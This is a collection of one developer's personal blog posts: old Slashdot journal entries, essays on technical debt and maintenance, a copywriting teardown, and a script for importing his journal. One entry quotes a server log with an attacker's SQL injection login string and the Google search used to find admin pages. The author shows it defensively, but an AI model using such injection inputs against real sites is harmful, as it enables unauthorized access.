<file_sep>---
title: "corolla"
date: 2005-07-27
slashdot_url: https://slashdot.org/journal/113005/corolla
---
<p>bit sad, but i've joined the <a href="http://toyotaownersclub.com/">toyota owner's club</a> website</p>
<p>here's some of my posts:<br><a href="http://toyotaownersclub.com/forums/index.php?showtopic=38971&st=0&p=395831">http://toyotaownersclub.com/forums/index.php?showtopic=38971&st=0&p=395831</a></p>
<file_sep>---
title: "You, yes you, reading my /. journal"
date: 2004-01-29
slashdot_url: https://slashdot.org/journal/60097/you-yes-you-reading-my--journal
---
<p>Drop me a line, any line. I want to know who reads this. You could add a comment if you don't mind everyone else seeing.</p>
<p>xx</p>
<p>Tim</p>
<file_sep>---
title: Maintaining software - a bare minimum
layout: post
---
All the press goes to new features, but there's a lot that has to happen just to stand still in software development.
None of the following results in "shiny new feature that everyone is excited about". It's the ongoing work that anyone who's not in day-to-day software development might not appreciate, sometimes questioning where the time is going.
Here's a catalog of things that eat engineering time, but that are eventually unavoidable if you don't want to grind to a halt under a mountain of [tech debt](/2020/07/09/approaches-to-refactoring-and-technical-debt/):
## Non-feature work
### 1) Bugs
Customers (or your monitoring) notice something that's not working:
- Investigate and ship a fix,
- or worse, spend time investigating only to discover it can't / won't be changed or fixed.
### 2) Minor dependency upgrades
e.g. upgrading [xUnit](https://www.nuget.org/packages/xunit) from `v2.4.0` to `v2.4.2`
These are usually trivial if your tests are good and the authors respect [Semantic Versioning](https://semver.org/). They still need to be done regularly to keep the impact small.
### 3) Major dependency upgrades
e.g. [upgrading MediatR from v9.x to v10.0.0](https://github.com/jbogard/MediatR/wiki/Migration-Guide-9.x-to-10.0)
> "This release includes the following breaking changes in the API ..."
> ~ MediatR release notes
### 4) Platform upgrades
e.g.
- [Upgrading Rails from 5.2 to 6.0](https://www.fastruby.io/blog/rails/upgrades/upgrade-rails-from-5-2-to-6-0.html)
- [Migrating apps from Azure Functions version 3.x to version 4.x](https://learn.microsoft.com/en-us/azure/azure-functions/migrate-version-3-version-4?tabs=net6-in-proc%2Cazure-cli%2Clinux&pivots=programming-language-csharp)
There is often significant changes, including removal and changing (sometimes called "breaking" or "breaking changes") things that your code relies on.
You might be tempted to put these off. Don't. The longer you leave it, the worse your problem becomes, eventually becoming insurmountable.
### 5) Fundamental shifts
Sometimes there's an enormous shift in technology, e.g.
- On-premise compute to cloud compute.
- Desktop to mobile.
- Server-rendered web to API + Single Page Applications (SPAs).
- More recently, the shift from servers to serverless.
- Data storage (SQL vs NoSql, vs Graph databases).
- New hosting and technology platforms.
If you don't keep up to date then you find it increasingly hard to operate what you have (no engineers want to work with the old tech, the online world no longer supports you with information and tooling, etc). And your customers expectations start to demand things that your outdated approaches are just unable to support.
Have a plan for regularly considering these and taking action. You might spin up new teams to try them out, or give people "Friday time" to explore new things. The only thing you mustn't do is "nothing".
## Why is keeping on top of upgrades important?
Why not just ignore the upgrades till you need them?
Two reasons:
- Security fixes
- The longer you let it pile up, the harder it gets (exponentially so).
## Keeping changes small
If you allow upgrades to pile up for a month or so, you'll have one big patch that upgrades many things. If something breaks (even with good test coverage) it can be a lengthy process to figure out which upgrade broke it and what to do about it.
If you do this regularly (weekly at least), then you'll only be upgrading a few minor versions at a time, and it will be immediately obvious where to start looking if something breaks (i.e. roll back, then upgrade the 5 dependencies one at a time, and look at the changelog of the one that breaks it.)
## Test coverage
Upgrades are a key reason that good test coverage (and the functionality level) are very important. Without these you will have a significant manual testing effort for every upgrade. Relying on manual testing results in avoiding upgrades for longer, and breakages making it to production unnoticed.
## Monitoring
Good exception monitoring and telemetry in production will improve your ability to catch any oddities that slip through your test coverage.
<file_sep>---
title: "Ian & broadband"
date: 2006-05-23
slashdot_url: https://slashdot.org/journal/136058/ian-broadband
---
<p>Ian was <a href="http://www.pure-virtual.org/ian/PermaLink.aspx?guid=941da462-0038-44ee-99e8-fc2253e7a4c0">here</a> (old news).<br>Found that page <a href="http://www.google.co.uk/search?hl=en&q=site%3A+timwise.co.uk&btnG=Search&meta=">here</a></p>
<p>New broadband connection up on timwise.dyndns.org (no website yet).<br>Nice bt engineer, who called 10 mins before showing up. Handy.</p>
<file_sep>---
title: "taff tour"
date: 2004-07-24
slashdot_url: https://slashdot.org/journal/78327/taff-tour
---
<p>the <a href="http://www.t.abell.dsl.pipex.com/photos/wales_20040715/">pics </a>are up.</p>
<file_sep>---
title: Approaches to refactoring, technical debt and legacy code
layout: post
---
Sometimes a codebase has an overwhelming amount of "terrible" stuff that as a developer you almost can't help but just diving in and fixing it. Doing this without thinking too hard can result in many variations of failure, such as:
* Upsetting the people paying you because you are doing something they don't consider important.
* Never finishing the mammoth rewrite you took on, resulting in a mess of two different styles of code.
* Personal burnout.
* Fixing things that maybe weren't actually that important (even if they make you cry whenever you have to look at their source code), at the expense of failing to fix more urgent problems or building useful features.
---
⏩ If you want the executive summary, head over to my [Leaders guide to technical debt - aka "why can't we ship anything!?"](https://charmconsulting.co.uk/2020/11/27/leaders-guide-to-technical-debt/) 🧐. For the technical details read on below.

## Must-read articles
Here's a couple of must-read articles on the subject:
### Refactoring
> "We take the next feature that we are asked to build, and instead of detouring around all the weeds and bushes, we take the time to clear a path through some of them."
>
> ~ <NAME>
In short, don't make debt cleanup its own task, just tackle what gets in your way as you go, and leave the camp tidier than you found it.
I recommend reading the whole article here: [Refactoring -- Not on the backlog! by <NAME>](https://ronjeffries.com/xprog/articles/refactoring-not-on-the-backlog/), it's not too long.
### Technical Debt
> "Tech debt": an overloaded term. There are at least 5 distinct things we mean [when] we say “technical debt”.
>
> 1. Maintenance work
> 2. Features of the codebase that resist change
> 3. Operability choices that resist change
> 4. Code choices that suck the will to live
> 5. Dependencies that resist upgrading
Read the full explanation of each type of debt here: [Towards an understanding of technical debt by <NAME>](http://laughingmeme.org/2016/01/10/towards-an-understanding-of-technical-debt/), a bit longer but an important piece of writing.
## Huge piles of debt
If your project is sooo "bad" that you feel like throwing it out, you might do well to heed this quote:
> "There is only one way to eat an elephant: a bite at a time."
>
> ~ [<NAME> (via Psychology today of all places!)](https://www.psychologytoday.com/us/blog/mindfully-present-fully-alive/201804/the-only-way-eat-elephant)
Which to me means iterate your way to good.
It doesn't mean have no plan, in fact you should know where you are trying to get to and how realistic that is so you don't end up with a rewrite that can never be completed because it was too ambitious.
## Even more reading
### Is a mess a debt?
> "A mess is not a technical debt. A mess is just a mess."
>
> ~ Uncle Bob
[A Mess is not a Technical Debt by Uncle Bob](https://sites.google.com/site/unclebobconsultingllc/a-mess-is-not-a-technical-debt) suggests that the use of the term debt is for a considered short term trade-off just like taking out a loan, but a mess is nothing of the sort as there is no up-side to creating a mess versus having a clean but temporary solution to a problem.
### More taxonomy of bad code: the Reckless/Prudent vs Deliberate/Indavertent quadrant
<NAME> shows that you can categorize debt by whether it is reckless or prudent, and separately whether it was deliberately or inadvertently added to the code.
> "Technical Debt is a metaphor, so the real question is whether or not the debt metaphor is helpful about thinking about how to deal with design problems, and how to communicate that thinking. A particular benefit of the debt metaphor is that it's very handy for communicating to non-technical people."
>
> "The useful distinction isn't between debt or non-debt, but between prudent and reckless debt ... there's also a difference between deliberate and inadvertent debt."
>
> "The decision of paying the interest versus paying down the principal still applies, so the metaphor is still helpful for this case."
>
> ~ [The Technical Debt Quadrant by <NAME>ler](https://martinfowler.com/bliki/TechnicalDebtQuadrant.html)
These are useful definitions that can help clearly communicate complex issues with the code to people not directly involved in the code.
It's well worth reading much more of Martin Fowler's writing. There's so much to learn from Martin about programming good practice; the articles are all written in a very human and accessible style.
### Legacy tests
Now that TDD is widely adopted we're faced with cleaning up the output of those who [cargo-culted](https://en.wikipedia.org/wiki/Cargo_cult_programming) test coverage, or had well meaning but ultimately badly formed attempts at adding tests to their code, sometimes with prodigious volumes of test code.
I think "Legacy tests" is a useful term to describe these problematic tests. Nat Pryce outlines some useful hints that you have legacy tests on your hands:
> "Symptoms of legacy tests I have encountered include:
> ...
> Tests are named after issue identifiers in the company's issue tracker.
> Bonus points if the issue tracker no longer exists."
>
> ~ Nat Pryce, [Working Effectively with Legacy Tests](http://natpryce.com/articles/000813.html)
## The audio version from Codurance
[Codurance](https://codurance.com/) hosted an insightful round-table podcast episode with a group of people who are clearly very experienced. You can listen here: <https://codurance.com/podcasts/2019-01-21-legacy-code/> and will doubtless be inspired by some things in there. The conversation takes a little while to build momentum but it's worth the wait.
Here some highlights of what I learnt from listening to the show:
### The Feathers Book
* [Working Effectively with Legacy Code by <NAME>](https://www.amazon.co.uk/Working-Effectively-Legacy-Michael-Feathers/dp/0131177052/) is *the* book to read on the subject.
Feathers defines legacy code as code without tests.
> "Preserving behaviour is a large challenge. When we need to make changes and preserve behaviour, it can involve considerable risk."
>
> ~ <NAME>
This book is heavily geared towards unpicking the difficulties in getting untested code under test in object-oriented static typed languages such as Java, C# and C++, and modifying it safely.
It is a detailed and thorough treatment of all the tactics available to bring untested object-oriented code under test, specifically sprawling and smelly classes and methods. It won't help you with larger scale problems such as poor structuring of microservice architecture, message bus systems etc.
This [article summarizing the Feathers' Legacy Code book](https://understandlegacycode.com/blog/key-points-of-working-effectively-with-legacy-code/) has some of the tactics detailed and gives a good flavour of the book so you can decide whether to dive deeper.
### Named techniques and related libraries
* [Characterization testing](https://michaelfeathers.silvrback.com/characterization-testing) is the idea of creating tests to probe and demonstrate the existing behaviour of previously untested code.
* Related to this is "approval tests" which allow you to easily incorporate snapshots of output (json, xml, logs etc) into your tests in order to capture existing behaviour and be able to spot any variations that pop up during refactoring.
* [ApprovalTests.net](https://github.com/approvals/ApprovalTests.Net) is a dotnet library for implementing approval tests.
* Introducing [seams](http://wiki.c2.com/?SoftwareSeam) into software can be a useful technique for breaking down untestable monoliths into testable chunks on the way to better code.
* [Mutation testing (wikipedia)](https://en.wikipedia.org/wiki/Mutation_testing) (more info on [mutation testing at csharp academy](http://csharp.academy/mutation-testing/)) is a useful way of checking how good your test coverage really is. It is the idea of making (almost) random changes to the code under test to see what whether your tests spot the change in behaviour.
* For dotnet this can be done with [Stryker.net](https://github.com/stryker-mutator/stryker-net)
### Approaches from hard-won experience
* Make as few changes as possible to get untested production code under test. The first cut of tests will likely be fragile.
* It's more important that legacy code that is already in production continues to behave as it currently does than that it behaves as originally specified. People and downstream systems may now rely on that "incorrect" behaviour.
* Does the organisation (culture, systems, pressures etc.) cause bad code to be created? If you don't fix that then you will always get more "legacy" code.
* The importance of competent technical leadership within an organisation for preventing the build up of catastrophic levels of technical debt.
* When communicating, quantify the cost of problems with the legacy code. E.g. "you are losing 1 in 5 developer-days to coping with bugs introduced due to the lack of automated regression tests".
* Have the hard conversations with the business about the cost of fixing the mess.
* Doing a rewrite is (almost) always the wrong answer.
* Get small wins, even if you are facing a huge challenge.
## Maybe modelling is the problem
Something that looks like bad code could be that way because of a failure to properly model the real world.
Domain Driven Design (DDD) has much to teach on the matter, and this is a great video on the why modelling could be the problem:
[Technical debt isn't technical - <NAME>øst - DDD Europe 2019 - YouTube](https://youtu.be/d2Ddo8OV7ig)
## Small Batches Automated Testing Podcast Episode
Podcast episode [Software Delivery in Small Batches: Automated Testing with <NAME>](https://share.transistor.fm/s/a5ca21cb) talks about practical approaches to legacy code, including the idea that you actually can't always avoid writing some more untested code because of the cost-benefit trade-off.
> "You can’t just slap a test on any change that you make because the underlying functionality might be really complex"
The episode describes the evolution of our industry in learning the importance of test coverage for avoiding known risks in software development, and declares that you cannot truly call yourself a professional developer if you are not writing tests.
> "I always recommend starting with the easiest most trivial stuff, adding some tests in those areas and then working up to the bigger areas"
Some relevant thoughts from the episode:
* Good test coverage is a pre-requisite to any higher-level automation such as continuous-deployment. (1:35)
* To add tests to a project that has no coverage you have to retrofit test tooling and infrastructure (CI, data management etc). "That can be very non-trivial, even for someone very experienced, ... it's going to be a huge challenge to add that stuff retroactively." (3:10)
* With regards to the idea of "Declaring that we are going to write tests for every PR from now on." (7:10)
* "You can't just slap a test on any change that you make because the underlying functionality might be really complex. In order to write a test you might have to have certain setup data to create the state required for that test might be extremely complicated. To expect somebody to include a test with every PR is not realistic. For some features your change might be 10 minutes of work but to get the test setup, that might be weeks of work in order to take the 20-minutes to write the test."
* "I always recommend starting with the easiest most trivial stuff, adding some tests in those areas and then working up to the bigger areas. It seems that you should start with the most important stuff but that's not realistic because the most important stuff is also the hardest to test."
* A useful step might be to just get tests in place on your own machine without worrying about CI initially (they were talking about training a developer, but it's a useful thought for being efficient tackling legacy projects) (9:30)
* "Having high quality code is almost impossible without good test coverage. Test coverage enables refactoring. If you can't refactor your code it's really hard to keep it in good shape." (17:15)
* As you flush out bugs by adding more and more coverage: "The type of issues you find over time, the complexity goes up, because they're not really related to the interplay of something known, they're usually related to more and more complications; instead of just one unit of code interacting... [it's] 5 or 10 or 200; these larger components and permutations that you never considered in the first place, because some customer hit it for the first time." Moments where you go "woah I never even knew that was possible" (25:50)
* "It all comes down to managing risk, risk of the software in question being correct" (30:20)
* "There's a risk of producing incorrect software, but there's also a risk to the business that the engineers will not be able to keep pace with the business if they have to spend so much extra time just verifying the software, there's a mistake in thinking that writing tests takes more time, the reality is that if you have automated tests then you will be able to work much faster than if you didn't"
* On a project that had tests once - "...at some point tests had stopped passing", should you "blow them away or fix them?". (32:22)
* For an "application that's been developed for two years with no tests with this big team and they don't have the skills; that's going to be a big up front investment, it's going to be a year or two before [adding test coverage] starts to pay off."
* "... at some point tests had stopped passing and they were never updated - okay do I trust these or not? If they're not passing, do I blow them away or fix them." - In this case blew them away and spent three months writing tests such that he could build new features. "Even now [the project has] low test coverage. This has been a multi-year effort."
* "This is one of the real problems when it comes to testing, is that if for some reason the people who start the project don't do testing, and the project is successful enough to go on for X number of years without it, then the effort required to add testing after the fact is an order of magnitude than it would have been at the beginning." ... "the can gets kicked down the road."
* "Frustrated by the attitude of 'let's not spend time making this code high quality because what if this startup fails' but what if this startup succeeds? Yes it may be possible you only survive by cutting corners but not convinced, think it might be a delusion."
* "The only way to go fast is to go well." ~ <NAME>
* "Why is good code good? It's fast to work with. I prefer to say 'the code is understandable' because that makes it more clear. Good/bad sounds like inward looking practicing of a craft. 'Not Understandable' is more tangible - that means it's time-consuming and expensive to work with. Understandable code is faster and less expensive to work with." (35:20)
> "It all comes down to managing risk"
The people on the episode are Ruby developers, but the lessons they talk of apply regardless of language.
(Some of the quotations above are paraphrased)
## Thanks, now I'm even less sure what to do
Are you wrestling with something you don't like in a codebase you have to deal with? I'm guessing that's why you're here. Or maybe someone sent you this along with a rant about the tech debt in the codebase you own.
Either way, I suggest slowing down a bit, sitting down together (while maintaining social distancing), and considering how all the things that bother you about the code in front of you fit in to the various taxonomies detailed above. Then use that assessment to make a calm and rational plan about roughly where you want to get to. Then decide on the *one* next thing you will do towards that. Use the Ron Jeffries approach to get you there without wasting time on things that don't really matter.
Practically, that might mean if you have a user story, ticket or Trello card for a feature, it might take longer to do as you include the work to "pay down" some of that badness along the way, knowing that it will improve your overall velocity over time. Be wary of pulling out separate "debt" stories to do, though that can work if the team dynamic is right.
To keep your stress levels down make it a shared team problem, have a bit of a laugh about it, take regular breaks in the great outdoors, and support each other.
Good luck!
I'll leave you with this little song I found on YouTube about bugs:
<iframe width="560" height="315" src="https://www.youtube.com/embed/kuJI4hmvY8c" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
## Further Reading
If you want to avoid the task at hand by reading the whole internet in the hope that it will help, start here:
* A lengthy set of opinions on what to do with a huge 10 year old untested pile of spaghetti code: <https://softwareengineering.stackexchange.com/questions/416242/is-it-the-correct-practice-to-keep-more-than-10-years-old-spaghetti-legacy-code>
* Pluralsight have written an excellent long-form article on the subject: <https://www.pluralsight.com/blog/software-development/erasing-tech-debt>
* The Engineering Manager on technical debt: <https://www.theengineeringmanager.com/growth/how-to-argue-the-space-to-tackle-technical-debt/>
* <https://adevait.com/software/technical-debt>
* <https://medium.com/@adamberlinskyschine/wtf-is-technical-debt-b9e9d5f89d9>
* <https://wtfismyengineertalkingabout.com/2017/03/18/wtf-is-technical-debt/>
* <https://codingsans.com/blog/technical-debt>
* <https://builtin.com/software-engineering-perspectives/technical-debt>
* <https://www.bmc.com/blogs/technical-debt-explained-the-complete-guide-to-understanding-and-dealing-with-technical-debt/>
* <https://dzone.com/articles/what-technical-debt-it-and-how-to-calculate-it>
* <https://bigrivertech.com/technical_debt_assessment/>
* <https://www.cutter.com/consulting/technical-debt-assessment-and-valuation>
* <https://martinfowler.com/tags/technical%20debt.html>
* <https://codeclimate.com/blog/10-point-technical-debt-assessment/>
* <http://thinkapps.com/blog/development/technical-debt-calculation/>
* <https://www.productplan.com/glossary/technical-debt/>
* <https://leadership.garden/tips-on-prioritizing-tech-debt>
* <https://www.steveonstuff.com/2022/01/27/no-such-thing-as-clean-code>
* <https://leadership.garden/tips-on-prioritizing-tech-debt/>
<file_sep>---
title: "April showers came early. MS vendor lock in."
date: 2005-03-31
slashdot_url: https://slashdot.org/journal/102509/april-showers-came-early-ms-vendor-lock-in
---
<p>So, I went to the pub last night with my neighbour, which was nice. And we went on our bikes, which was nice. And we had a couple of drinks, which was nice. And we went outside to go home, and it was pouring with rain, which was interesting. So we got soaked.</p>
<p>Going to an MSDN evening later. Bit of professional development.</p>
<p>On another topic, it occurs to me that the standard practice in Microsoft.NET is to write software that only runs with MSSQL, this means there is starting to be a lot of code available that won't run on anything else. I imagine there are potential optimisations from writing specifically for ms sql, but I can't help thinking that it is a typical ms vendor lock in. Whether it was a conscious decision to make this the default or not I couldn't say and don't really care, the end result is the same. Take a look on codeproject and see how many projects say "only runs with ms sql".</p>
<file_sep>---
title: "good for nothing script kiddies"
date: 2004-02-26
slashdot_url: https://slashdot.org/journal/63429/good-for-nothing-script-kiddies
---
<p>Just been looking at the web logs for my cubs website (twyfordcubs.org.uk). Some one tried to get into the admin section, they found it though google, interesting.</p>
<p>The log entry:<br>2004-02-13 06:27:21 172.16.17.32 GET<nobr> </nobr>/cubs/admin.asp 200 2587 484 266 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0)+Opera+7.11++[en] http://www.google.com/search?q=allinurl:.co.uk+admin.asp&hl=en&lr=&ie=UTF-8&oe=utf-8&start=80&sa=N</p>
<p>then, sure enough, entry in my log-on log:<br>login: ' or 1=1--<br>13/02/2004 06:27:29 172.16.17.32 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Opera 7.11 [en]<br>Logged in: False</p>
<p>Pathetic attempt, but I'll bet they get in somewhere. My company's site for example - guess I'd better check up on that.<br>At least they're using a decent browser.</p>
<p>backtrace:<br>Tracing route to sisfo2.idola.net.id [172.16.17.32]<br>over a maximum of 30 hops:</p>
<p>
1 1 ms 1 ms 1 ms my.router [192.168.1.1]<br>
2 16 ms 16 ms 14 ms 81-86-71-1.dsl.pipex.com [81.86.72.1]<br>
3 16 ms 16 ms 16 ms 62-241-161-41.dsl.pipex.com [62.241.161.41]<br>
4 18 ms 16 ms 16 ms POS4-0.GW2.LND9.ALTER.NET [146.188.56.97]<br>
5 15 ms 16 ms 17 ms so-4-0-0.xr1.lnd9.alter.net [15172.16.17.32]<br>
6 16 ms 15 ms 16 ms so-0-1-0.TR1.LND9.ALTER.NET [146.188.15.33]<br>
7 94 ms 93 ms 94 ms so-7-0-0.IR1.NYC12.ALTER.NET [146.188.8.197]<br>
8 94 ms 94 ms 95 ms 0.so-1-0-0.IL1.NYC9.ALTER.NET [152.63.23.61]<br>
9 158 ms 160 ms 157 ms 0.so-1-1-0.TL1.SAC1.ALTER.NET [172.16.17.32]<br>
10 158 ms 157 ms 157 ms 0.so-7-0-0.XL1.SAC1.ALTER.NET [1192.168.3.11]<br>
11 158 ms 158 ms 157 ms 0.so-3-0-0.XR1.SAC1.ALTER.NET [192.168.3.11]<br>
12 157 ms 158 ms 158 ms POS6-0.IG2.SAC1.ALTER.NET [172.16.31.10]<br>
13 * * * Request timed out.<br>
14 * * * Request timed out.</p>
<p>PS: I wonder if password hashing is a bit extreme for a cubs website.</p>
<file_sep>---
layout: post
title: Teardown of a landing page story
date: 2018-12-10 08:40:13.000000000 +00:00
type: post
parent_id: '0'
published: true
password: ''
status: publish
categories: []
tags: []
author:
login: timabell
email: <EMAIL>
display_name: timabell
first_name: ''
last_name: ''
permalink: "/2018/12/10/teardown-of-a-landing-page-story/"
---
Here's my analysis of the depth of information and thought that's gone into a deceptively brief piece of landing-page copy. It's from <https://realtimeboard.com/blog/accelerate-growth-early-stage-startups/> that I'm trying to use as inspiration for <http://schemaexplorer.io/>
I had to de-construct the example story in order to work out how to do my own so having put the work in I thought I'd share it with you all here.
* * *
Here's the original in full:
> “Hey, I know that you have two kids and you’re always buying the same milk, eggs, peanut butter, and bread every single week, but you’re also both really busy working parents. You don’t have much time and you’d much rather be able to spend time at home with your family than being at a busy grocery store. So there’s this great service called Farmstead where you’re able to have that same stuff delivered to you. You don’t even have to think about it, you don’t have to remember each week to put in all of those same things that you order on a weekly basis anyway. They can just bring it to you and you don’t have to worry about it. Delivery is free with a weekly subscription. I think you should definitely try this out, I think you’re going to save yourself a bunch of time.”
And now one piece at a time with my observations about what is being conveyed in this information-dense block of prose. You are looking at the work of a pro when you read the above text, and unless you look closely it's easy to miss just how carefully crafted the whole thing is and how it touches on so many thoughts and feelings the ideal customer of Farmstead is likely to have, guiding them to the conclusion that they should give the service a try.
* * *
> Hey,
being personable, we are not a big faceless corporation, you can actually talk to us like humans
> I know that you have two kids
narrow down audience to parents (turn off non-parents, get parents more interested)
> and you’re always buying the same milk, eggs, peanut butter, and bread
describe a behaviour they recognise they already do (increase engagement with the text, encourage reading further), hint that we're going to solve a problem they have because they might be annoyed about the regular chore
> every single week,
slightly pejorative terminology hints at the fact you might not be happy about repeating this tedious task, draw attention to your current pain that we're going to solve
> but you’re also both really busy working parents.
focus down the pain point to be that it's a time consuming repeating the task and you wish you had more time back, hint that we're going to be giving that time back to you
> You don’t have much time
really drive that _you have no time_ point home
> and you’d much rather be able to spend time at home with your family
paint a picture of how much better your life would be if you take on our solution to your pain. Point out just what you're sacrificing to go to the shops.
> than being at a busy grocery store.
not only do you have the pain of lost time, but the experience of shopping is unpleasant (because it's so busy)
* * *
Now that you know it's you we want to help, we recognise your pain and we've shown we know how your life could be better...
> So there’s this great service called Farmstead
Introduce the brand name. Tease. Read on to satisfy that completion-bias tendency in your brain that leaves you yearning to know what information you don't have about this "Farmstead".
Also the name itself conveys a lot of meaning
"Farm" - fresh produce, direct from the supplier
"stead" - homely, small supplies, not industrial or full of chemicals
> where you’re able to have that same stuff
allay the fear that you'll still have to go back to the old thing anyway because there's something we don't sell
> delivered to you.
oh I see, so it's a door to door delivery service. Noted. The shape of the offering is starting to emerge.
> You don’t even have to think about it,
We've worked really hard on all our UX (user experience), automated as much as possible etc. so this will be easier than what you do now and better than competitors can do
> you don’t have to remember each week to put in all of those same things that you order on a weekly basis anyway.
now you know it's even got built in scheduled deliveries
> They can just bring it to you
re-iterate delivery
> and you don’t have to worry about it.
reminder that you do have have to worry about getting your normal shop done, speaks to pain of running out of the things because you forgot, worrying how you're going to fit it in your day. Differentiates new offering as being something that just happens meaning you never run out
> Delivery is free
Objection handling - people don't want to pay for delivery when they could go to shops for nothing (even though it has a cost it's how people see it). People have been burned before by finding something good then being stung for expensive delivery. I would expect that this is a common objection/question that came back in earlier rounds of testing with users and it's been integrated into this prose to pre-empt the question before it's even been asked.
> with a weekly subscription.
warm people up to the payments they'll have to make in a non-threatening way
> I think you should definitely try this out,
nudge to take action. "Try" implies that it's not a commitment and you can change your mind, allaying fears of being locked in for a year
> I think you’re going to save yourself a bunch of time.
point to hard cost-benefit for the service - you don't have time (as mentioned to start with, we know this person feels like they have no time because they are still reading after they identified with the first section). One last reminder of the key pain to the offering solves - lack of time
* * *
Let me know if that's helped you in any way.
If you happen to be someone that deals with databases and are keen to try new tools then please do me a favour and sign up to the <http://schemaexplorer.io/> mailing list (you'll have to ignore my terrible marketing text till I'm as good as Brady).
~ Tim
<file_sep>---
title: Importing Slashdot Journal Articles by Yak
layout: post
---
I've imported all my old slashdot journal articles because:
- posterity
- I like the fact I've been writing on the internet for so long and I want my domain to show it
- there's something to be said for keeping your own writing on your own domain and not someone else's
- because I can.
It turns out that although slashdot has an export feature, it doesn't include the journal entries. Let the yak-shaving begin.
## What worked
Use wget to download all the paginated lists of posts into html files. (I forget whether I looped this or got wget to spider it, either would work).
Parse paginated list of posts to get individual post urls into file `urls.txt`:
```bash
#!/bin/sh -v
echo "" > urls.txt
for page in page*.html; do
xidel --data "$page" --xquery 'for $var in //article return $var//span[@class="story-title"]//a[@rel]/@href' >> urls.txt
done
```
Loop through those urls downloading the individual post pages
```bash
#!/bin/bash -v
mkdir -p posts
cd posts
while read url; do
echo $url
file="${url/https:\/\/slashdot.org\/journal\//}"
file2="${file/\//-}.html"
echo $file2
curl $url >> $file2
done < ../urls.txt
```
Parse the downloaded files, transforming them into individual markdown files:
```ruby
#!/usr/bin/env ruby
require 'nokogiri'
require 'date'
Dir.glob("posts/*").each do |input|
puts input
doc = File.open(input) { |f| Nokogiri::HTML(f) }
doc.css("article[data-fhtype='journal']").each do |a|
url=a.at_css(".story-title a[rel]").attribute("href").text
date = Date.parse(a.at_css("time").text[3..])
outfile = date.to_s + "-slashdot-journal-" + url[23..].gsub("/","-") + ".md"
puts outfile
File.open("out/" + outfile, "w") {|out|
out.write "---"
out.write "\n"
out.write "title: \"" + a.at_css(".story-title a[rel]").text + "\""
out.write "\n"
out.write "date: "+ date.to_s
out.write "\n"
out.write "slashdot_url: https:"+ url
out.write "\n"
out.write "---"
out.write "\n"
out.write "\n"
a.css("div[class=body] div[class=p]").each do |p|
out.write p.inner_html.strip
out.write "\n"
out.write "\n"
end
}
end
end
```
## Exploration with nokogiri
Once you have an html file on disk you can explore the in-memory model interactively with `irb`, which helps iterate on scripts like the above more rapidly.
E.g.
```ruby
$ irb
irb(main):001:0> doc = File.open("page-0.html") { |f| Nokogiri::XML(f) }
irb(main):002:0> doc.css("article[data-fhtype='journal']").each {|a| puts "---", "title: " + a.at_css(".story-title").text, "time: "+ a.at_css("time").text, "---";};nil
```
## Dead-ends explored
- [xq](https://github.com/sibprogrammer/xq) - doesn't seem to provide a rich enough expression to pick bits out of html and stitch them back together in interesting ways, more of a tool for capturing better structured data.
- [xidel](https://github.com/benibela/xidel) - can do xquery not just xpath, got further with this but not far enough
- `wget`'ing the paginated list of posts - for some reason this resulted in repeated content when parsed with nokogiri
- `wget`'ing individual post pages - suspected manipulation of html, so dropped down to `curl`
## References
- Example of xquery in action: <https://stackoverflow.com/questions/5987474/return-multiple-data-elements/5993577#5993577>
- Using xidel for parsing html: <https://stackoverflow.com/questions/21015587/get-content-between-a-pair-of-html-tags-using-bash/21026668#21026668>
- XQuery intro: <https://www.w3schools.com/xml/xquery_intro.asp>
- Using nokogiri for parsing, official docs: <https://nokogiri.org/#parsing-and-querying>
- Parsing with nokogiri: <https://nokogiri.org/tutorials/parsing_an_html_xml_document.html>
- [Nokogiri cheatsheet gist](https://gist.github.com/carolineartz/10276637)
- Scraping with nokogiri walkthrough: <https://dev.to/kreopelle/nokogiri-scraping-walkthrough-alk>
- Globbing files in ruby: <https://stackoverflow.com/questions/7677410/how-do-i-get-a-listing-of-only-files-using-dir-glob/7677543#7677543>
- Looping through file lines in ruby: <https://stackoverflow.com/questions/1521462/looping-through-the-content-of-a-file-in-bash/1521498#1521498>
- String replacement in bash: <https://linuxhandbook.com/replace-string-bash/>
- Parsing odd date formats with ruby: <https://stackoverflow.com/questions/11617410/parse-date-string-in-ruby/11617505#11617505>
<file_sep>---
title: "weekend update"
date: 2004-09-27
slashdot_url: https://slashdot.org/journal/85072/weekend-update
---
<p>Ok, it's been a while, and between now and then there was a super weekend.</p>
<p>Saturday. Spur of the moment cultural day with my super mate D. We went to see <a href="http://www.londontown.com/LondonEvents/Democracy/455d7">Democracy</a> at Wyndham's in the West End. The play provided fascinating insight into post war German politics. In the opening scene I thought I was not going to understand anything due to my not exactly perfect knowledge of German history, however it quickly became evident that the substance was a brilliant analysis of the personal feelings and motivations of those governing both West and East Germany up till the fall of the Berlin wall and nothing was presumed of the audience's knowledge. A scintillating two and a half hours.</p>
<p>There was also a china town feast, and a trip to see an old friend, which was truly a pleasure. Eventually I got reminded to go home as I was starting to look worse for wear, being somewhat cream crackered, and that, was that.</p>
<p>Sunday involved guitar playing, church going and pub testing with another close friend, who just happens to be next in the alphabet - E!<br>Glad to say my guitar practice is paying off a bit and I wasn't too rubbish by musical person's standards<nobr> </nobr>;). I had the opportunity to attempt playing flute - now there's an experience! Respect to all who have mastered that fine art, I managed to make a noise eventually but it wasn't pretty!</p>
<p>kisses to all</p>
<p>xx</p>
<p>Tim</p>
<file_sep>---
title: "website stats"
date: 2004-10-16
slashdot_url: https://slashdot.org/journal/87126/website-stats
---
<p>apologies to anyone who had noticed <a href="http://timwise.dyndns.org/awstats/awstats.pl?config=timwise&configdir=/etc/awstats">my stats</a> have been offline since sep 24th.</p>
<p>I had a power failure which upset my linux server / knackered old laptop (no battery!), I had to <a href="http://awstats.sourceforge.net/docs/awstats_faq.html#OLDLOG">manually update</a> the entrys for all missed days and have only just got round to it. Should be ok now.</p>
<p>In other news, Kev has promised as a journal, further to putting <a href="http://homepage.ntlworld.com/andy.brook55/kev/">some photos</a>. online - good work mr kev. (note at bottom of pic pages a credit to me<nobr> </nobr>:)<br>Also Andy has an <a href="http://homepage.ntlworld.com/andy.brook55/">website</a> which is worth a look, check out the uni dessertation.</p>
<p>xx</p>
<p>Tim</p>
<file_sep>---
layout: post
title: Multiple working folders for git on Windows XP
date: '2011-11-16T09:46:00.011Z'
author: <NAME>
tags:
- howto
- windows
- git
